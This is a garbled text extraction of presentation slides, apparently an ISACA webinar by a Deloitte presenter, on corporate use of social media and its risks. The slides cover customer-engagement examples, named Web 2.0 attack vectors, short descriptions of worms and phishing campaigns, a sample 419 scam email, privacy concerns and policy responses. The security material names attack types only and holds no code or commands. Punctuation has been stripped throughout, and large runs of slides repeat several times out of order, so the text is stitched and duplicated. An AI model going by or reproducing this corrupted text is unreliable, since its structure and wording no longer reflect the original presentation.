ldquoHas what weve learned about writing software the last 20 years been expressed in the design of Web 20 Of course not It cant even be said to have a design If showing people what vulnerabilities can do were going to somehow encourage software developers to be more careful about programming Web 20 would not be happeningrdquo - Marcus Ranum in InfoSec Magazine May 2008
bull Trust mdash Data reliability commonly causes issues for social media in the workplace The Web has partially solved this with techniques such as inbound link counting but reputation and voting systems are starting to appear often as plug-ins for social media tools
bull May also take advantage of URL Shortening ndash bitly trim tinyurlcom etc
wwwisacaorg40
Risks and challenges (cont)Risks and challenges (cont)
bull More on phishing mdash social networks are a target rich environment
wwwisacaorg41
Risks and challenges (cont)Risks and challenges (cont)
bull More on phishing mdash social networks are a target rich environment (cont)
ldquoDearest Onehellip
Sorry for the nature of this email please bear with me
I am Natasha Kone a 22 year old lady now i was born on the 1st of January 1986 to the family of Kone My fatherrsquos name is Kamara Cone He was a very wealthy Gold and Cocoa Merchant based in ACCRA and ABIDJAN respectively I am their only child When I was a kid I attended a private school and things were well for me and my parents Things changed when I was in High School my mother died on the 21st October 1994 My father then took me very special and gave me motherly care As fate had it my father died last yearhelliphelliphelliphelliphelliphelliphelliprdquo- See httpwww419legalorg for more details
bull The 419 scams have evolved with the technology ndash now using LinkedIn to target specific individuals
wwwisacaorg42
Risks and challenges (cont)Risks and challenges (cont)
bull Reputation mdash Damage to company brandreputation through inappropriate comments or remarks from employeesndash Even a lack of a response may damage the brand For example XYZ Company Inc
creates a Twitter account call XYZ_Cares and then fails to use the accountndash Other examples include creating social media program but not telling the rest of the
company about it so they may be unaware of any promotions or offers being publicized
bull Copyright violation mdash Third-party material such as essays articles and photographs are used without written consent from the proprietor
bull Intellectual Property theft mdash Harder to prevent inadvertent data leakage through the one-to-many nature of Web 20 as a medium
wwwisacaorg43
Risks and challenges (cont)Risks and challenges (cont)
bull Failures in the use of Social Media mdash most companies that use Social Media donrsquot approach it the way they would with other mission critical technologyndash At best it can be said that most companies today are merely dabbling with Social
Mediahellipndash Few have approached the solution with an integrated strategy or a concrete business
case usually because they either arenrsquot fully convinced of its value or have been slowed by the security and legal issues
ndash Without a strategy and proper metrics based on a business case their projects will remain small mismanaged and likely to fail
ldquoFully half of all Social Media investments will failrdquomdash Gartner
wwwisacaorg44
Risks and challenges (cont)Risks and challenges (cont)ldquoWhen I discovered YouTube I didnt work for five days I did nothing I viewed cookie monster sings chocolate rain about 1000 timesrdquo- Michael Scott from The Office
bull Productivity mdash Users employ social media tools for nonproductive purposes such as socializing (ldquoSocial Notworkingrdquo)
httpnewsbbccouk2hibusiness8325865stm
wwwisacaorg45
Risks and challenges (cont)Risks and challenges (cont)
bull Technical Integration mdash Most organizations note that integration between individual Web 20 applications and their overall infrastructure is a major concern
ndash Sign in using your account withbull Facebook AOLbull Twitter Bloggerbull Myspace WordPressbull Yahoo Netlogbull Google OpenIDbull Windows Live ID flickr
wwwisacaorg46
Risks and challenges (cont)Risks and challenges (cont)
bull Information hoarding mdash In many industries value is placed on what an employee knows that others do not know This belief prevents data sharing
bull Quantification mdash Researchers currently face challenges quantifying social networking benefitsndash Valuation techniques include among others Beckstromrsquos law which states that mdash ldquoThe
value of a network equals the net value of each userrsquos transactions conducted through that network valued from the perspective of each user and summed for allrdquo
Or alternatively
ndash httpenwikipediaorgwikiBeckstromrsquos_law
wwwisacaorg47
Risks and challenges (cont)Risks and challenges (cont)
bull Litigation issues mdash Discrimination defamation violation of privacy and harassment are some of the potential concerns that might result in litigation issues
wwwisacaorg48
A quick word on privacyA quick word on privacy
ldquoPeople have really gotten comfortable not only sharing more information and different kinds but more openly and with more people That social norm is just something that has evolved over timerdquo
mdash Mark Zuckerberg Facebook founder
ldquoIf you have something that you donrsquot want anyone to know maybe you shouldnrsquot be doing it in the first placerdquo
mdash Eric Schmidt CEO Google Inc
wwwisacaorg49
A quick word on privacy (cont)A quick word on privacy (cont)
bull Loss of Fourth Amendment protectionbull Encryption of data storage unlikelybull Lack of encryption while data in usebull Data remanence limited attempt to address
wwwisacaorg50
Responding to the risks and challengesResponding to the risks and challenges
bull Policies and proceduresndash Acceptable use policy
bull Details how social networking sites and applications can be usedbull Define consequences for failure to comply eg ldquotermination of employment and
legal actionrdquo
bull Risk assessmentndash Establish what information is most critical to the businessndash Understand how information might become vulnerable and how to protect it
(data mapping)
wwwisacaorg51
Responding to the risks and challengesResponding to the risks and challenges
bull Education and awarenessndash Inform user of the information security risks involved and how to guard
against thembull For example only install or run applications from trusted sources approved by the
corporate IT department
wwwisacaorg52
Responding to the risks and challenges Responding to the risks and challenges (cont)(cont)
bull Vulnerability Assessmentsndash Identifying quantifying and prioritizing the potential vulnerabilities that Social
Networking may present to the organizationbull Firewalls
ndash Historically firewalls focused on ports IP addresses and packetsndash But social networking applications operate on Ports 80 amp 443ndash Next-generation firewall technology that offers granular control of social
networking functionalitybull Identify applications regardless of port protocol evasive tactic or SSLbull Identify users regardless of IP addressbull Scan application content in real-timebull Visibility and policy control over application access
wwwisacaorg53
What is next in the world of What is next in the world of social networkingsocial networking
wwwisacaorg54
Where we are at todayWhere we are at today
bull Enterprise Social Media has crossed the tipping point and is no longer considered an ldquoemergingrdquo technology
ldquoThe Hype CyclerdquohttpenwikipediaorgwikiHype_cycle
wwwisacaorg55
Whatrsquos next in the world of social Whatrsquos next in the world of social networkingnetworking
bull Increase in the use of mobile devices to access Social Networksndash Over 600 million people will use their phone to access Social Networks by
2013 and increase of more than 400 than 2009 figure of 140 millionSource mdash eMarketer
bull Increase in frequency of accessndash Facebook mobile users are 50 more active than other users of the site
bull Take your social profile with you as you travel the Webndash For example mdash Facebook Connect
bull Social Networks will become more pervasive mdash broadcasting your location in geo-networking appsndash Interaction between devices For example your carrsquos navigation system will
be able to learn your friendrsquos location and provide directions to them
wwwisacaorg56
Some further predictionsSome further predictions
bull Some quotes on social networksndash ldquoProbably the greatest transformative force in our generation absent a major
warrdquo mdash Mark Zuckerberg Facebook founderndash ldquo(Twitter is)hellip Something important that has the potential to change the
world though we have a long way to gordquo mdash Biz Stone Co-founder of Twitter
wwwisacaorg57
QampAQampA
wwwisacaorg58
Todayrsquos PresentersTodayrsquos Presenters
Nelson GibbsSenior ManagerAERS ndash Audit amp Enterprise Risk ServicesDeloitte amp Touche LLPngibbsdeloittecom+1 213 593 4241
wwwisacaorg59
AppendixAppendix
bull Additional resources ndash Gopal Raj et al ldquoWeb 20 reinvents corporate networkingrdquo Deloitte
Consulting LLP (2008)ndash The Economist mdash A special report on social networking ldquoJanuary 30 2010rdquondash Fraser Matthew Dutta Soumitra (2008) Throwing Sheep in the Boardroom
How Online Social Networking Will Transform Your Life Work and Worldndash ldquoWall of Facebook The Social Networks Plan to Dominate the Internetrdquo mdash
and Keep Google Out by Fred Vogelstein Wired Magazine (June 2009)ndash httpwwwwiredcomtechbizitmagazine17-07ff_facebookwallGreatndash ldquoThe Future is Social Not Search Facebook COO Saysrdquo by Ryan Singel
Wired Magazine (October 2009) httpwwwwiredcomepicenter200910facebook-social-2
ndash British Computer Society Social Media Web site mdashhttpwwwbcsorgsocialmedia
wwwisacaorg60
This presentation contains general information only and Deloitte is not by means of this presentation rendering accounting business financial investment legal tax or other professional advice or services This presentation is not a substitute for such professional advice or services nor should it be used as a basis for any decision or action that may affect your business Before making any decision or taking any action that may affect your business you should consult a qualified professional advisor
Deloitte its affiliates and related entities shall not be responsible for any loss sustained by any person who relies on this presentation
wwwisacaorg28
Enhance customer and partner Enhance customer and partner relationshipsrelationships
bull Opens the lines of communication beyond typical spokespeople such as marketing sales and PR and provides an avenue for other important stakeholders (eg engineers scientists product managers) to gather firsthand feedback from customers
bull Allow customers to access help beyond traditional means with networks that provide peer support and a user-generated knowledgebase while monitoring customer perception
bull Provide a forum for collaborative business development education and communications with vendors OEMs and other partners
bull Allow consumers who know your products and services best to become a part of the new offering development process
Revenue growthbull A major consumer goods company improved sales by 315 by including
customer ratings user-generated product reviews and other social features on its online storefront also resulting in a 40 uptick in average order value
wwwisacaorg29
Enhance customer and partner Enhance customer and partner relationships (cont)relationships (cont)
bull Procter amp Gamblendash Capessa launched in the ldquoYahoo Healthrdquo section of Yahoocom one of the
worlds leading internet destinations Women who register with Capessayahoocom have access to several topic areas including parenting pregnancy weight loss relationships career healthy living and care givinghttprealwomenrealadvicecom
wwwisacaorg30
Enhance customer and partner Enhance customer and partner relationships (cont)relationships (cont)
bull American Expressndash OPEN Forum an online resource and networking site for business owners
The site is designed to forge meaningful business connections and provide practical actionable information and insights from influential bloggers industry leaders and savvy entrepreneurshttpwwwopenforumcom
wwwisacaorg31
Enhance customer and partner Enhance customer and partner relationships (cont)relationships (cont)
bull State of Louisville Kentuckyndash Interactive audit findings on Web site Allows the users to discuss previous
audit findingshttpwwwlouisvillekygovInternalAudit
wwwisacaorg32
Enhance customer and partner Enhance customer and partner relationships (cont)relationships (cont)
bull Amazonndash A social network for people who love books Users are able to create a
virtual shelf to show off their books see what their friends are reading and discover new books httpwwwshelfaricom
wwwisacaorg33
Enhance customer and partner Enhance customer and partner relationships (cont)relationships (cont)
bull Bank of America (BofA)ndash On January 29 2010 Bank of America Web site was down BofA used
twitter to keep in touch with its customers to let them know the latest update
wwwisacaorg34
Risks and challengesRisks and challenges
wwwisacaorg35
Risks and challengesRisks and challengesbull Farmers and Mobsters
ndash Top Facebook Applications
bull Source - httpstatisticsallfacebookcomapplicationsleaderboard (March 2010)bull There are now more than 500000 active applications on the Facebook Platform
Rank Name Monthly Active Users
1 FarmVille 82580911
2 Static FBML 46827021
3 Birthday Cards 41904049
4 Cafeacute World 30032716
5 Facebook for iPhone 29438848
6 Texas HoldEm Poker 28332917
7 Slide FunSpace 25630033
8 Happy Aquariam (BETA) 24915971
9 Mafia Wars 24704179
10 Causes 24317292
wwwisacaorg36
bull New security concerns and attack vectors mdash as a result of the shift in technology through Web services that are empowering server-side core technology components as well as Asynchronous JavaScript and XML (ldquoAJAXrdquo) and Rich Internet Application (ldquoRIArdquo) clients that are enhancing client-end interfaces in the browser itself
bull Top 10 Web 20 Attack Vectors mdash httpnet-squarecomwhitepapersTop10_Web20_AVpdfndash Cross-site scripting (ldquoCSSrdquo) in AJAX eg ldquoSamy worm that exploited MySpacecomrsquos CSS flawrdquondash XML poisoning mdash poison XML blocks coming from AJAX clientndash Malicious AJAX code execution mdash replay of cookies for each requestndash RSSAtom injection mdash inject JavaScripts into the RSS feeds to generate attack on client browserndash Web Services Definition Language (ldquoWSDLrdquo) scanning and enumerationndash Client-side validation in AJAX routines mdash fail to perform server-side checksndash Web services routing issues mdash compromise of intermediate nodesndash Parameter manipulation with SOAP mdash web services consume information and variables from SOAPndash XPATH injection in SOAP message mdash bypass authentication mechanismsndash RIA thick client binary manipulation mdash issues with session management
Risks and challenges (cont)Risks and challenges (cont)
wwwisacaorg37
Risks and challenges (cont)Risks and challenges (cont)bull Example worms phishing attacks affecting social networking sites
ndash Koobface ndash targets Facebook MySpace hi5 Bebo Twitter and other sites Users are prompted to click on a URL purporting to be an update from Adobe and a worm is downloaded to the PC which looks for personal data
ndash Fbaction - Facebook phishing attack that encourages users to sign up for fbactionnet using their Facebook credentials Those credentials are then used to hijack the Facebook account
wwwisacaorg38
Risks and challenges (cont)Risks and challenges (cont)
ndash Boface - convinces users to click on a link pointing to a video resulting in a download Shortly after the download is complete the userrsquos Facebook account will be hijacked and used as a means of spamming (and propagating a worm to) all their friends
bull Common element ndash they all take advantage of the implied trust that social networking users have with each other
wwwisacaorg39
Risks and challenges (cont)Risks and challenges (cont)
ldquoHas what weve learned about writing software the last 20 years been expressed in the design of Web 20 Of course not It cant even be said to have a design If showing people what vulnerabilities can do were going to somehow encourage software developers to be more careful about programming Web 20 would not be happeningrdquo - Marcus Ranum in InfoSec Magazine May 2008
bull Trust mdash Data reliability commonly causes issues for social media in the workplace The Web has partially solved this with techniques such as inbound link counting but reputation and voting systems are starting to appear often as plug-ins for social media tools
bull May also take advantage of URL Shortening ndash bitly trim tinyurlcom etc
wwwisacaorg40
Risks and challenges (cont)Risks and challenges (cont)
bull More on phishing mdash social networks are a target rich environment
wwwisacaorg41
Risks and challenges (cont)Risks and challenges (cont)
bull More on phishing mdash social networks are a target rich environment (cont)
ldquoDearest Onehellip
Sorry for the nature of this email please bear with me
I am Natasha Kone a 22 year old lady now i was born on the 1st of January 1986 to the family of Kone My fatherrsquos name is Kamara Cone He was a very wealthy Gold and Cocoa Merchant based in ACCRA and ABIDJAN respectively I am their only child When I was a kid I attended a private school and things were well for me and my parents Things changed when I was in High School my mother died on the 21st October 1994 My father then took me very special and gave me motherly care As fate had it my father died last yearhelliphelliphelliphelliphelliphelliphelliprdquo- See httpwww419legalorg for more details
bull The 419 scams have evolved with the technology ndash now using LinkedIn to target specific individuals
wwwisacaorg42
Risks and challenges (cont)Risks and challenges (cont)
bull Reputation mdash Damage to company brandreputation through inappropriate comments or remarks from employeesndash Even a lack of a response may damage the brand For example XYZ Company Inc
creates a Twitter account call XYZ_Cares and then fails to use the accountndash Other examples include creating social media program but not telling the rest of the
company about it so they may be unaware of any promotions or offers being publicized
bull Copyright violation mdash Third-party material such as essays articles and photographs are used without written consent from the proprietor
bull Intellectual Property theft mdash Harder to prevent inadvertent data leakage through the one-to-many nature of Web 20 as a medium
wwwisacaorg43
Risks and challenges (cont)Risks and challenges (cont)
bull Failures in the use of Social Media mdash most companies that use Social Media donrsquot approach it the way they would with other mission critical technologyndash At best it can be said that most companies today are merely dabbling with Social
Mediahellipndash Few have approached the solution with an integrated strategy or a concrete business
case usually because they either arenrsquot fully convinced of its value or have been slowed by the security and legal issues
ndash Without a strategy and proper metrics based on a business case their projects will remain small mismanaged and likely to fail
ldquoFully half of all Social Media investments will failrdquomdash Gartner
wwwisacaorg44
Risks and challenges (cont)Risks and challenges (cont)ldquoWhen I discovered YouTube I didnt work for five days I did nothing I viewed cookie monster sings chocolate rain about 1000 timesrdquo- Michael Scott from The Office
bull Productivity mdash Users employ social media tools for nonproductive purposes such as socializing (ldquoSocial Notworkingrdquo)
httpnewsbbccouk2hibusiness8325865stm
wwwisacaorg45
Risks and challenges (cont)Risks and challenges (cont)
bull Technical Integration mdash Most organizations note that integration between individual Web 20 applications and their overall infrastructure is a major concern
ndash Sign in using your account withbull Facebook AOLbull Twitter Bloggerbull Myspace WordPressbull Yahoo Netlogbull Google OpenIDbull Windows Live ID flickr
wwwisacaorg46
Risks and challenges (cont)Risks and challenges (cont)
bull Information hoarding mdash In many industries value is placed on what an employee knows that others do not know This belief prevents data sharing
bull Quantification mdash Researchers currently face challenges quantifying social networking benefitsndash Valuation techniques include among others Beckstromrsquos law which states that mdash ldquoThe
value of a network equals the net value of each userrsquos transactions conducted through that network valued from the perspective of each user and summed for allrdquo
Or alternatively
ndash httpenwikipediaorgwikiBeckstromrsquos_law
wwwisacaorg47
Risks and challenges (cont)Risks and challenges (cont)
bull Litigation issues mdash Discrimination defamation violation of privacy and harassment are some of the potential concerns that might result in litigation issues
wwwisacaorg48
A quick word on privacyA quick word on privacy
ldquoPeople have really gotten comfortable not only sharing more information and different kinds but more openly and with more people That social norm is just something that has evolved over timerdquo
mdash Mark Zuckerberg Facebook founder
ldquoIf you have something that you donrsquot want anyone to know maybe you shouldnrsquot be doing it in the first placerdquo
mdash Eric Schmidt CEO Google Inc
wwwisacaorg49
A quick word on privacy (cont)A quick word on privacy (cont)
bull Loss of Fourth Amendment protectionbull Encryption of data storage unlikelybull Lack of encryption while data in usebull Data remanence limited attempt to address
wwwisacaorg50
Responding to the risks and challengesResponding to the risks and challenges
bull Policies and proceduresndash Acceptable use policy
bull Details how social networking sites and applications can be usedbull Define consequences for failure to comply eg ldquotermination of employment and
legal actionrdquo
bull Risk assessmentndash Establish what information is most critical to the businessndash Understand how information might become vulnerable and how to protect it
(data mapping)
wwwisacaorg51
Responding to the risks and challengesResponding to the risks and challenges
bull Education and awarenessndash Inform user of the information security risks involved and how to guard
against thembull For example only install or run applications from trusted sources approved by the
corporate IT department
wwwisacaorg52
Responding to the risks and challenges Responding to the risks and challenges (cont)(cont)
bull Vulnerability Assessmentsndash Identifying quantifying and prioritizing the potential vulnerabilities that Social
Networking may present to the organizationbull Firewalls
ndash Historically firewalls focused on ports IP addresses and packetsndash But social networking applications operate on Ports 80 amp 443ndash Next-generation firewall technology that offers granular control of social
networking functionalitybull Identify applications regardless of port protocol evasive tactic or SSLbull Identify users regardless of IP addressbull Scan application content in real-timebull Visibility and policy control over application access
wwwisacaorg53
What is next in the world of What is next in the world of social networkingsocial networking
wwwisacaorg54
Where we are at todayWhere we are at today
bull Enterprise Social Media has crossed the tipping point and is no longer considered an ldquoemergingrdquo technology
ldquoThe Hype CyclerdquohttpenwikipediaorgwikiHype_cycle
wwwisacaorg55
Whatrsquos next in the world of social Whatrsquos next in the world of social networkingnetworking
bull Increase in the use of mobile devices to access Social Networksndash Over 600 million people will use their phone to access Social Networks by
2013 and increase of more than 400 than 2009 figure of 140 millionSource mdash eMarketer
bull Increase in frequency of accessndash Facebook mobile users are 50 more active than other users of the site
bull Take your social profile with you as you travel the Webndash For example mdash Facebook Connect
bull Social Networks will become more pervasive mdash broadcasting your location in geo-networking appsndash Interaction between devices For example your carrsquos navigation system will
be able to learn your friendrsquos location and provide directions to them
wwwisacaorg56
Some further predictionsSome further predictions
bull Some quotes on social networksndash ldquoProbably the greatest transformative force in our generation absent a major
warrdquo mdash Mark Zuckerberg Facebook founderndash ldquo(Twitter is)hellip Something important that has the potential to change the
world though we have a long way to gordquo mdash Biz Stone Co-founder of Twitter
wwwisacaorg57
QampAQampA
wwwisacaorg58
Todayrsquos PresentersTodayrsquos Presenters
Nelson GibbsSenior ManagerAERS ndash Audit amp Enterprise Risk ServicesDeloitte amp Touche LLPngibbsdeloittecom+1 213 593 4241
wwwisacaorg59
AppendixAppendix
bull Additional resources ndash Gopal Raj et al ldquoWeb 20 reinvents corporate networkingrdquo Deloitte
Consulting LLP (2008)ndash The Economist mdash A special report on social networking ldquoJanuary 30 2010rdquondash Fraser Matthew Dutta Soumitra (2008) Throwing Sheep in the Boardroom
How Online Social Networking Will Transform Your Life Work and Worldndash ldquoWall of Facebook The Social Networks Plan to Dominate the Internetrdquo mdash
and Keep Google Out by Fred Vogelstein Wired Magazine (June 2009)ndash httpwwwwiredcomtechbizitmagazine17-07ff_facebookwallGreatndash ldquoThe Future is Social Not Search Facebook COO Saysrdquo by Ryan Singel
Wired Magazine (October 2009) httpwwwwiredcomepicenter200910facebook-social-2
ndash British Computer Society Social Media Web site mdashhttpwwwbcsorgsocialmedia
wwwisacaorg60
This presentation contains general information only and Deloitte is not by means of this presentation rendering accounting business financial investment legal tax or other professional advice or services This presentation is not a substitute for such professional advice or services nor should it be used as a basis for any decision or action that may affect your business Before making any decision or taking any action that may affect your business you should consult a qualified professional advisor
Deloitte its affiliates and related entities shall not be responsible for any loss sustained by any person who relies on this presentation
wwwisacaorg29
Enhance customer and partner Enhance customer and partner relationships (cont)relationships (cont)
bull Procter amp Gamblendash Capessa launched in the ldquoYahoo Healthrdquo section of Yahoocom one of the
worlds leading internet destinations Women who register with Capessayahoocom have access to several topic areas including parenting pregnancy weight loss relationships career healthy living and care givinghttprealwomenrealadvicecom
wwwisacaorg30
Enhance customer and partner Enhance customer and partner relationships (cont)relationships (cont)
bull American Expressndash OPEN Forum an online resource and networking site for business owners
The site is designed to forge meaningful business connections and provide practical actionable information and insights from influential bloggers industry leaders and savvy entrepreneurshttpwwwopenforumcom
wwwisacaorg31
Enhance customer and partner Enhance customer and partner relationships (cont)relationships (cont)
bull State of Louisville Kentuckyndash Interactive audit findings on Web site Allows the users to discuss previous
audit findingshttpwwwlouisvillekygovInternalAudit
wwwisacaorg32
Enhance customer and partner Enhance customer and partner relationships (cont)relationships (cont)
bull Amazonndash A social network for people who love books Users are able to create a
virtual shelf to show off their books see what their friends are reading and discover new books httpwwwshelfaricom
wwwisacaorg33
Enhance customer and partner Enhance customer and partner relationships (cont)relationships (cont)
bull Bank of America (BofA)ndash On January 29 2010 Bank of America Web site was down BofA used
twitter to keep in touch with its customers to let them know the latest update
wwwisacaorg34
Risks and challengesRisks and challenges
wwwisacaorg35
Risks and challengesRisks and challengesbull Farmers and Mobsters
ndash Top Facebook Applications
bull Source - httpstatisticsallfacebookcomapplicationsleaderboard (March 2010)bull There are now more than 500000 active applications on the Facebook Platform
Rank Name Monthly Active Users
1 FarmVille 82580911
2 Static FBML 46827021
3 Birthday Cards 41904049
4 Cafeacute World 30032716
5 Facebook for iPhone 29438848
6 Texas HoldEm Poker 28332917
7 Slide FunSpace 25630033
8 Happy Aquariam (BETA) 24915971
9 Mafia Wars 24704179
10 Causes 24317292
wwwisacaorg36
bull New security concerns and attack vectors mdash as a result of the shift in technology through Web services that are empowering server-side core technology components as well as Asynchronous JavaScript and XML (ldquoAJAXrdquo) and Rich Internet Application (ldquoRIArdquo) clients that are enhancing client-end interfaces in the browser itself
bull Top 10 Web 20 Attack Vectors mdash httpnet-squarecomwhitepapersTop10_Web20_AVpdfndash Cross-site scripting (ldquoCSSrdquo) in AJAX eg ldquoSamy worm that exploited MySpacecomrsquos CSS flawrdquondash XML poisoning mdash poison XML blocks coming from AJAX clientndash Malicious AJAX code execution mdash replay of cookies for each requestndash RSSAtom injection mdash inject JavaScripts into the RSS feeds to generate attack on client browserndash Web Services Definition Language (ldquoWSDLrdquo) scanning and enumerationndash Client-side validation in AJAX routines mdash fail to perform server-side checksndash Web services routing issues mdash compromise of intermediate nodesndash Parameter manipulation with SOAP mdash web services consume information and variables from SOAPndash XPATH injection in SOAP message mdash bypass authentication mechanismsndash RIA thick client binary manipulation mdash issues with session management
Risks and challenges (cont)Risks and challenges (cont)
wwwisacaorg37
Risks and challenges (cont)Risks and challenges (cont)bull Example worms phishing attacks affecting social networking sites
ndash Koobface ndash targets Facebook MySpace hi5 Bebo Twitter and other sites Users are prompted to click on a URL purporting to be an update from Adobe and a worm is downloaded to the PC which looks for personal data
ndash Fbaction - Facebook phishing attack that encourages users to sign up for fbactionnet using their Facebook credentials Those credentials are then used to hijack the Facebook account
wwwisacaorg38
Risks and challenges (cont)Risks and challenges (cont)
ndash Boface - convinces users to click on a link pointing to a video resulting in a download Shortly after the download is complete the userrsquos Facebook account will be hijacked and used as a means of spamming (and propagating a worm to) all their friends
bull Common element ndash they all take advantage of the implied trust that social networking users have with each other
wwwisacaorg39
Risks and challenges (cont)Risks and challenges (cont)
ldquoHas what weve learned about writing software the last 20 years been expressed in the design of Web 20 Of course not It cant even be said to have a design If showing people what vulnerabilities can do were going to somehow encourage software developers to be more careful about programming Web 20 would not be happeningrdquo - Marcus Ranum in InfoSec Magazine May 2008
bull Trust mdash Data reliability commonly causes issues for social media in the workplace The Web has partially solved this with techniques such as inbound link counting but reputation and voting systems are starting to appear often as plug-ins for social media tools
bull May also take advantage of URL Shortening ndash bitly trim tinyurlcom etc
wwwisacaorg40
Risks and challenges (cont)Risks and challenges (cont)
bull More on phishing mdash social networks are a target rich environment
wwwisacaorg41
Risks and challenges (cont)Risks and challenges (cont)
bull More on phishing mdash social networks are a target rich environment (cont)
ldquoDearest Onehellip
Sorry for the nature of this email please bear with me
I am Natasha Kone a 22 year old lady now i was born on the 1st of January 1986 to the family of Kone My fatherrsquos name is Kamara Cone He was a very wealthy Gold and Cocoa Merchant based in ACCRA and ABIDJAN respectively I am their only child When I was a kid I attended a private school and things were well for me and my parents Things changed when I was in High School my mother died on the 21st October 1994 My father then took me very special and gave me motherly care As fate had it my father died last yearhelliphelliphelliphelliphelliphelliphelliprdquo- See httpwww419legalorg for more details
bull The 419 scams have evolved with the technology ndash now using LinkedIn to target specific individuals
wwwisacaorg42
Risks and challenges (cont)Risks and challenges (cont)
bull Reputation mdash Damage to company brandreputation through inappropriate comments or remarks from employeesndash Even a lack of a response may damage the brand For example XYZ Company Inc
creates a Twitter account call XYZ_Cares and then fails to use the accountndash Other examples include creating social media program but not telling the rest of the
company about it so they may be unaware of any promotions or offers being publicized
bull Copyright violation mdash Third-party material such as essays articles and photographs are used without written consent from the proprietor
bull Intellectual Property theft mdash Harder to prevent inadvertent data leakage through the one-to-many nature of Web 20 as a medium
wwwisacaorg43
Risks and challenges (cont)Risks and challenges (cont)
bull Failures in the use of Social Media mdash most companies that use Social Media donrsquot approach it the way they would with other mission critical technologyndash At best it can be said that most companies today are merely dabbling with Social
Mediahellipndash Few have approached the solution with an integrated strategy or a concrete business
case usually because they either arenrsquot fully convinced of its value or have been slowed by the security and legal issues
ndash Without a strategy and proper metrics based on a business case their projects will remain small mismanaged and likely to fail
ldquoFully half of all Social Media investments will failrdquomdash Gartner
wwwisacaorg44
Risks and challenges (cont)Risks and challenges (cont)ldquoWhen I discovered YouTube I didnt work for five days I did nothing I viewed cookie monster sings chocolate rain about 1000 timesrdquo- Michael Scott from The Office
bull Productivity mdash Users employ social media tools for nonproductive purposes such as socializing (ldquoSocial Notworkingrdquo)
httpnewsbbccouk2hibusiness8325865stm
wwwisacaorg45
Risks and challenges (cont)Risks and challenges (cont)
bull Technical Integration mdash Most organizations note that integration between individual Web 20 applications and their overall infrastructure is a major concern
ndash Sign in using your account withbull Facebook AOLbull Twitter Bloggerbull Myspace WordPressbull Yahoo Netlogbull Google OpenIDbull Windows Live ID flickr
wwwisacaorg46
Risks and challenges (cont)Risks and challenges (cont)
bull Information hoarding mdash In many industries value is placed on what an employee knows that others do not know This belief prevents data sharing
bull Quantification mdash Researchers currently face challenges quantifying social networking benefitsndash Valuation techniques include among others Beckstromrsquos law which states that mdash ldquoThe
value of a network equals the net value of each userrsquos transactions conducted through that network valued from the perspective of each user and summed for allrdquo
Or alternatively
ndash httpenwikipediaorgwikiBeckstromrsquos_law
wwwisacaorg47
Risks and challenges (cont)Risks and challenges (cont)
bull Litigation issues mdash Discrimination defamation violation of privacy and harassment are some of the potential concerns that might result in litigation issues
wwwisacaorg48
A quick word on privacyA quick word on privacy
ldquoPeople have really gotten comfortable not only sharing more information and different kinds but more openly and with more people That social norm is just something that has evolved over timerdquo
mdash Mark Zuckerberg Facebook founder
ldquoIf you have something that you donrsquot want anyone to know maybe you shouldnrsquot be doing it in the first placerdquo
mdash Eric Schmidt CEO Google Inc
wwwisacaorg49
A quick word on privacy (cont)A quick word on privacy (cont)
bull Loss of Fourth Amendment protectionbull Encryption of data storage unlikelybull Lack of encryption while data in usebull Data remanence limited attempt to address
wwwisacaorg50
Responding to the risks and challengesResponding to the risks and challenges
bull Policies and proceduresndash Acceptable use policy
bull Details how social networking sites and applications can be usedbull Define consequences for failure to comply eg ldquotermination of employment and
legal actionrdquo
bull Risk assessmentndash Establish what information is most critical to the businessndash Understand how information might become vulnerable and how to protect it
(data mapping)
wwwisacaorg51
Responding to the risks and challengesResponding to the risks and challenges
bull Education and awarenessndash Inform user of the information security risks involved and how to guard
against thembull For example only install or run applications from trusted sources approved by the
corporate IT department
wwwisacaorg52
Responding to the risks and challenges Responding to the risks and challenges (cont)(cont)
bull Vulnerability Assessmentsndash Identifying quantifying and prioritizing the potential vulnerabilities that Social
Networking may present to the organizationbull Firewalls
ndash Historically firewalls focused on ports IP addresses and packetsndash But social networking applications operate on Ports 80 amp 443ndash Next-generation firewall technology that offers granular control of social
networking functionalitybull Identify applications regardless of port protocol evasive tactic or SSLbull Identify users regardless of IP addressbull Scan application content in real-timebull Visibility and policy control over application access
wwwisacaorg53
What is next in the world of What is next in the world of social networkingsocial networking
wwwisacaorg54
Where we are at todayWhere we are at today
bull Enterprise Social Media has crossed the tipping point and is no longer considered an ldquoemergingrdquo technology
ldquoThe Hype CyclerdquohttpenwikipediaorgwikiHype_cycle
wwwisacaorg55
Whatrsquos next in the world of social Whatrsquos next in the world of social networkingnetworking
bull Increase in the use of mobile devices to access Social Networksndash Over 600 million people will use their phone to access Social Networks by
2013 and increase of more than 400 than 2009 figure of 140 millionSource mdash eMarketer
bull Increase in frequency of accessndash Facebook mobile users are 50 more active than other users of the site
bull Take your social profile with you as you travel the Webndash For example mdash Facebook Connect
bull Social Networks will become more pervasive mdash broadcasting your location in geo-networking appsndash Interaction between devices For example your carrsquos navigation system will
be able to learn your friendrsquos location and provide directions to them
wwwisacaorg56
Some further predictionsSome further predictions
bull Some quotes on social networksndash ldquoProbably the greatest transformative force in our generation absent a major
warrdquo mdash Mark Zuckerberg Facebook founderndash ldquo(Twitter is)hellip Something important that has the potential to change the
world though we have a long way to gordquo mdash Biz Stone Co-founder of Twitter
wwwisacaorg57
QampAQampA
wwwisacaorg58
Todayrsquos PresentersTodayrsquos Presenters
Nelson GibbsSenior ManagerAERS ndash Audit amp Enterprise Risk ServicesDeloitte amp Touche LLPngibbsdeloittecom+1 213 593 4241
wwwisacaorg59
AppendixAppendix
bull Additional resources ndash Gopal Raj et al ldquoWeb 20 reinvents corporate networkingrdquo Deloitte
Consulting LLP (2008)ndash The Economist mdash A special report on social networking ldquoJanuary 30 2010rdquondash Fraser Matthew Dutta Soumitra (2008) Throwing Sheep in the Boardroom
How Online Social Networking Will Transform Your Life Work and Worldndash ldquoWall of Facebook The Social Networks Plan to Dominate the Internetrdquo mdash
and Keep Google Out by Fred Vogelstein Wired Magazine (June 2009)ndash httpwwwwiredcomtechbizitmagazine17-07ff_facebookwallGreatndash ldquoThe Future is Social Not Search Facebook COO Saysrdquo by Ryan Singel
Wired Magazine (October 2009) httpwwwwiredcomepicenter200910facebook-social-2
ndash British Computer Society Social Media Web site mdashhttpwwwbcsorgsocialmedia
wwwisacaorg60
This presentation contains general information only and Deloitte is not by means of this presentation rendering accounting business financial investment legal tax or other professional advice or services This presentation is not a substitute for such professional advice or services nor should it be used as a basis for any decision or action that may affect your business Before making any decision or taking any action that may affect your business you should consult a qualified professional advisor
